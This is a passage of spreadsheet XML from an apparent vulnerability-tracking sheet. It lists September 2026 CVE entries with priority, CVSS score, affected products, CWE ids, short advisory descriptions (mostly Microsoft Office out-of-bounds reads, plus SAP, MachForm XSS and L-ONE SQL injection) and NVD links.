r="O1122" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1122" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1122" s="5" t="inlineStr" /><c r="R1122" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S1122" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1122" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72977</t></is></c></row><row r="1123"><c r="A1123" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1123" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1123" s="5" t="inlineStr"><is><t>CVE-2026-73029</t></is></c><c r="D1123" s="5" t="n"><v>6.5</v></c><c r="E1123" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1123" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1123" s="5" t="inlineStr" /><c r="H1123" s="5" t="n"><v>0.007</v></c><c r="I1123" s="5" t="inlineStr" /><c r="J1123" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1123" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1123" s="5" t="inlineStr" /><c r="M1123" s="5" t="inlineStr" /><c r="N1123" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1123" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1123" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1123" s="5" t="inlineStr" /><c r="R1123" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1123" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1123" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73029</t></is></c></row><row r="1124"><c r="A1124" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1124" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1124" s="5" t="inlineStr"><is><t>CVE-2026-76000</t></is></c><c r="D1124" s="5" t="n"><v>6.5</v></c><c r="E1124" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1124" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1124" s="5" t="inlineStr" /><c r="H1124" s="5" t="n"><v>0.003</v></c><c r="I1124" s="5" t="inlineStr" /><c r="J1124" s="5" t="inlineStr" /><c r="K1124" s="5" t="inlineStr" /><c r="L1124" s="5" t="inlineStr" /><c r="M1124" s="5" t="inlineStr" /><c r="N1124" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1124" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1124" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1124" s="5" t="inlineStr" /><c r="R1124" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1124" s="5" t="inlineStr"><is><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is></c><c r="T1124" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76000</t></is></c></row><row r="1125"><c r="A1125" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1125" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1125" s="5" t="inlineStr"><is><t>CVE-2026-76968</t></is></c><c r="D1125" s="5" t="n"><v>6.5</v></c><c r="E1125" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1125" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1125" s="5" t="inlineStr" /><c r="H1125" s="5" t="n"><v>0.002</v></c><c r="I1125" s="5" t="inlineStr" /><c r="J1125" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1125" s="5" t="inlineStr" /><c r="L1125" s="5" t="inlineStr" /><c r="M1125" s="5" t="inlineStr" /><c r="N1125" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1125" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1125" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1125" s="5" t="inlineStr" /><c r="R1125" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1125" s="5" t="inlineStr"><is><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is></c><c r="T1125" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76968</t></is></c></row><row r="1126"><c r="A1126" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1126" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1126" s="5" t="inlineStr"><is><t>CVE-2026-76971</t></is></c><c r="D1126" s="5" t="n"><v>6.5</v></c><c r="E1126" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1126" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1126" s="5" t="inlineStr" /><c r="H1126" s="5" t="n"><v>0.001</v></c><c r="I1126" s="5" t="inlineStr" /><c r="J1126" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1126" s="5" t="inlineStr" /><c r="L1126" s="5" t="inlineStr" /><c r="M1126" s="5" t="inlineStr" /><c r="N1126" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1126" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1126" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1126" s="5" t="inlineStr" /><c r="R1126" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1126" s="5" t="inlineStr"><is><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is></c><c r="T1126" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76971</t></is></c></row><row r="1127"><c r="A1127" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1127" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1127" s="5" t="inlineStr"><is><t>CVE-2026-77896</t></is></c><c r="D1127" s="5" t="n"><v>6.5</v></c><c r="E1127" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1127" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1127" s="5" t="inlineStr" /><c r="H1127" s="5" t="n"><v>0.007</v></c><c r="I1127" s="5" t="inlineStr" /><c r="J1127" s="5" t="inlineStr" /><c r="K1127" s="5" t="inlineStr" /><c r="L1127" s="5" t="inlineStr" /><c r="M1127" s="5" t="inlineStr" /><c r="N1127" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1127" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1127" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1127" s="5" t="inlineStr" /><c r="R1127" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S1127" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Remote Desktop Client allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1127" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77896</t></is></c></row><row r="1128"><c r="A1128" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1128" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1128" s="5" t="inlineStr"><is><t>CVE-2026-77911</t></is></c><c r="D1128" s="5" t="n"><v>6.5</v></c><c r="E1128" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1128" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1128" s="5" t="inlineStr" /><c r="H1128" s="5" t="n"><v>0.007</v></c><c r="I1128" s="5" t="inlineStr" /><c r="J1128" s="5" t="inlineStr" /><c r="K1128" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1128" s="5" t="inlineStr" /><c r="M1128" s="5" t="inlineStr" /><c r="N1128" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1128" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1128" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1128" s="5" t="inlineStr" /><c r="R1128" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1128" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1128" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77911</t></is></c></row><row r="1129"><c r="A1129" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1129" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1129" s="5" t="inlineStr"><is><t>CVE-2026-78441</t></is></c><c r="D1129" s="5" t="n"><v>6.5</v></c><c r="E1129" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1129" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1129" s="5" t="inlineStr" /><c r="H1129" s="5" t="n"><v>0.007</v></c><c r="I1129" s="5" t="inlineStr" /><c r="J1129" s="5" t="inlineStr" /><c r="K1129" s="5" t="inlineStr" /><c r="L1129" s="5" t="inlineStr" /><c r="M1129" s="5" t="inlineStr" /><c r="N1129" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1129" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1129" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1129" s="5" t="inlineStr" /><c r="R1129" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1129" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows OLE DB allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1129" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78441</t></is></c></row><row r="1130"><c r="A1130" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1130" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1130" s="5" t="inlineStr"><is><t>CVE-2026-78453</t></is></c><c r="D1130" s="5" t="n"><v>6.5</v></c><c r="E1130" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1130" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1130" s="5" t="inlineStr" /><c r="H1130" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1130" s="5" t="inlineStr" /><c r="J1130" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K11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30" s="5" t="inlineStr" /><c r="M1130" s="5" t="inlineStr" /><c r="N1130" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1130" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1130" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1130" s="5" t="inlineStr" /><c r="R1130" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1130" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1130" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78453</t></is></c></row><row r="1131"><c r="A1131" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1131" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1131" s="5" t="inlineStr"><is><t>CVE-2026-78502</t></is></c><c r="D1131" s="5" t="n"><v>6.5</v></c><c r="E1131" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1131" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1131" s="5" t="inlineStr" /><c r="H1131" s="5" t="n"><v>0.007</v></c><c r="I1131" s="5" t="inlineStr" /><c r="J1131" s="5" t="inlineStr" /><c r="K1131" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1131" s="5" t="inlineStr" /><c r="M1131" s="5" t="inlineStr" /><c r="N1131" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1131" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1131" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1131" s="5" t="inlineStr" /><c r="R1131" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1131" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1131" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78502</t></is></c></row><row r="1132"><c r="A1132" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1132" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1132" s="5" t="inlineStr"><is><t>CVE-2026-78503</t></is></c><c r="D1132" s="5" t="n"><v>6.5</v></c><c r="E1132" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1132" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1132" s="5" t="inlineStr" /><c r="H1132" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1132" s="5" t="inlineStr" /><c r="J1132" s="5" t="inlineStr" /><c r="K1132" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1132" s="5" t="inlineStr" /><c r="M1132" s="5" t="inlineStr" /><c r="N1132" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1132" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1132" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1132" s="5" t="inlineStr" /><c r="R1132" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1132" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1132" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78503</t></is></c></row><row r="1133"><c r="A1133" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1133" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1133" s="5" t="inlineStr"><is><t>CVE-2026-78515</t></is></c><c r="D1133" s="5" t="n"><v>6.5</v></c><c r="E1133" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1133" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1133" s="5" t="inlineStr" /><c r="H1133" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1133" s="5" t="inlineStr" /><c r="J1133" s="5" t="inlineStr" /><c r="K1133" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1133" s="5" t="inlineStr" /><c r="M1133" s="5" t="inlineStr" /><c r="N1133" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1133" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1133" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1133" s="5" t="inlineStr" /><c r="R1133" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1133" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1133" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78515</t></is></c></row><row r="1134"><c r="A1134" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1134" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1134" s="5" t="inlineStr"><is><t>CVE-2026-78520</t></is></c><c r="D1134" s="5" t="n"><v>6.5</v></c><c r="E1134" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1134" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1134" s="5" t="inlineStr" /><c r="H1134" s="5" t="n"><v>0.007</v></c><c r="I1134" s="5" t="inlineStr" /><c r="J1134" s="5" t="inlineStr" /><c r="K1134" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1134" s="5" t="inlineStr" /><c r="M1134" s="5" t="inlineStr" /><c r="N1134" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1134" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1134" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1134" s="5" t="inlineStr" /><c r="R1134" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1134" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T1134" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78520</t></is></c></row><row r="1135"><c r="A1135" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1135" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1135" s="5" t="inlineStr"><is><t>CVE-2026-78522</t></is></c><c r="D1135" s="5" t="n"><v>6.5</v></c><c r="E1135" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1135" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1135" s="5" t="inlineStr" /><c r="H1135" s="5" t="n"><v>0.007</v></c><c r="I1135" s="5" t="inlineStr" /><c r="J1135" s="5" t="inlineStr" /><c r="K1135" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1135" s="5" t="inlineStr" /><c r="M1135" s="5" t="inlineStr" /><c r="N1135" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1135" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1135" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1135" s="5" t="inlineStr" /><c r="R1135" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1135" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1135" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78522</t></is></c></row><row r="1136"><c r="A1136" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1136" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1136" s="5" t="inlineStr"><is><t>CVE-2026-78838</t></is></c><c r="D1136" s="5" t="n"><v>6.5</v></c><c r="E1136" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1136" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1136" s="5" t="inlineStr" /><c r="H1136" s="5" t="n"><v>0.004</v></c><c r="I1136" s="5" t="inlineStr" /><c r="J1136" s="5" t="inlineStr" /><c r="K1136" s="5" t="inlineStr" /><c r="L1136" s="5" t="inlineStr" /><c r="M1136" s="5" t="inlineStr" /><c r="N1136" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1136" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1136" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1136" s="5" t="inlineStr" /><c r="R1136" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1136" s="5" t="inlineStr"><is><t>A reflected cross-site scripting (XSS) vulnerability in the grid_datasource.php component of AppNitro MachForm v30 allows attackers to execute arbitrary Javascript in the context of the victim's browser via injecting a crafted payload into the filter[filters][0][field] parameter.</t></is></c><c r="T1136" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78838</t></is></c></row><row r="1137"><c r="A1137" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1137" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1137" s="5" t="inlineStr"><is><t>CVE-2026-79379</t></is></c><c r="D1137" s="5" t="n"><v>6.5</v></c><c r="E1137" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1137" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1137" s="5" t="inlineStr" /><c r="H1137" s="5" t="n"><v>0.003</v></c><c r="I1137" s="5" t="inlineStr" /><c r="J1137" s="5" t="inlineStr" /><c r="K1137" s="5" t="inlineStr" /><c r="L1137" s="5" t="inlineStr" /><c r="M1137" s="5" t="inlineStr" /><c r="N1137" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1137" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1137" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1137" s="5" t="inlineStr" /><c r="R1137" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S1137" s="5" t="inlineStr"><is><t>A buffer overflow in the SBC_DecodeFrames() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier and fixed in v.5.0 allows attackers to cause a Denial of Service (DoS) via sending a crafted frame.</t></is></c><c r="T1137" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79379</t></is></c></row><row r="1138"><c r="A1138" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1138" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1138" s="5" t="inlineStr"><is><t>CVE-2026-79573</t></is></c><c r="D1138" s="5" t="n"><v>6.5</v></c><c r="E1138" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1138" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1138" s="5" t="inlineStr" /><c r="H1138" s="5" t="n"><v>0.003</v></c><c r="I1138" s="5" t="inlineStr" /><c r="J1138" s="5" t="inlineStr" /><c r="K1138" s="5" t="inlineStr" /><c r="L1138" s="5" t="inlineStr" /><c r="M1138" s="5" t="inlineStr" /><c r="N1138" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1138" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1138" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1138" s="5" t="inlineStr" /><c r="R1138" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1138" s="5" t="inlineStr"><is><t>L-ONE v1.0.0 was discovered to contain multiple SQL injection vulnerabilities in the /attachment/getBusinessUploadList component via the busid, id, and taskid parameters. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T1138" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79573</t></is></c></row><row r="1139"><c r="A1139" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1139" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1139" s="5" t="inlineStr"><is><t>CVE-2026-80073</t></is></c><c r="D1139" s="5" t="n"><v>6.5</v></c><c r="E1139" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1139" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1139" s="5" t="inlineStr" /><c r="H1139" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1139" s="5" t="inlineStr" /><c r="J1139" s="5" t="inlineStr" /><c r="K1139" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L1139" s="5" t="inlineStr" /><c r="M1139" s="5" t="inlineStr" /><c r="N1139" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1139" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1139" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1139" s="5" t="inlineStr" /><c r="R1139" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1139" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1139" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80073</t></is></c></row><row r="1140"><c r="A1140" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1140" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1140" s="5" t="inlineStr"><is><t>CVE-2026-80076</t></is></c><c r="D1140" s="5" t="n"><v>6.5</v></c><c r="E1140" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1140" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1140" s="5" t="inlineStr" /><c r="H1140" s="5" t="n"><v>0.007</v></c><c r="I1140" s="5" t="inlineStr" /><c r="J1140" s="5" t="inlineStr" /><c r="K1140" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1140" s="5" t="inlineStr" /><c r="M1140" s="5" t="inlineStr" /><c r="N1140" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1140" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1140" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1140" s="5" t="inlineStr" /><c r="R1140" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1140" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1140" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80076</t></is></c></row><row r="1141"><c r="A1141" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1141" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1141" s="5" t="inlineStr"><is><t>CVE-2026-80078</t></is></c><c r="D1141" s="5" t="n"><v>6.5</v></c><c r="E1141" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1141" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1141" s="5" t="inlineStr" /><c r="H1141" s="5" t="n"><v>0.007</v></c><c r="I1141" s="5" t="inlineStr" /><c r="J1141" s="5" t="inlineStr" /><c r="K1141" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1141" s="5" t="inlineStr" /><c r="M1141" s="5" t="inlineStr" /><c r="N1141" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1141" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1141" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1141" s="5" t="inlineStr" /><c r="R1141" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1141" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1141" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80078</t></is></c></row><row r="1142"><c r="A1142" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1142" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1142" s="5" t="inlineStr"><is><t>CVE-2026-80079</t></is></c><c r="D1142" s="5" t="n"><v>6.5</v></c><c r="E1142" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1142" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1142" s="5" t="inlineStr" /><c r="H1142" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1142" s="5" t="inlineStr" /><c r="J1142" s="5" t="inlineStr" /><c r="K1142" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1142" s="5" t="inlineStr" /><c r="M1142" s="5" t="inlineStr" /><c r="N1142" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1142" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1142" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1142" s="5" t="inlineStr" /><c r="R1142" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1142" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1142" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80079</t></is></c></row><row r="1143"><c r="A1143" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1143" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1143" s="5" t="inlineStr"><is><t>CVE-2026-80082</t></is></c><c r="D1143" s="5" t="n"><v>6.5</v></c><c r="E1143" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1143" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1143" s="5" t="inlineStr" /><c r="H1143" s="5" t="n"><v>0.007</v></c><c r="I1143" s="5" t="inlineStr" /><c r="J1143" s="5" t="inlineStr" /><c r="K1143" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1143" s="5" 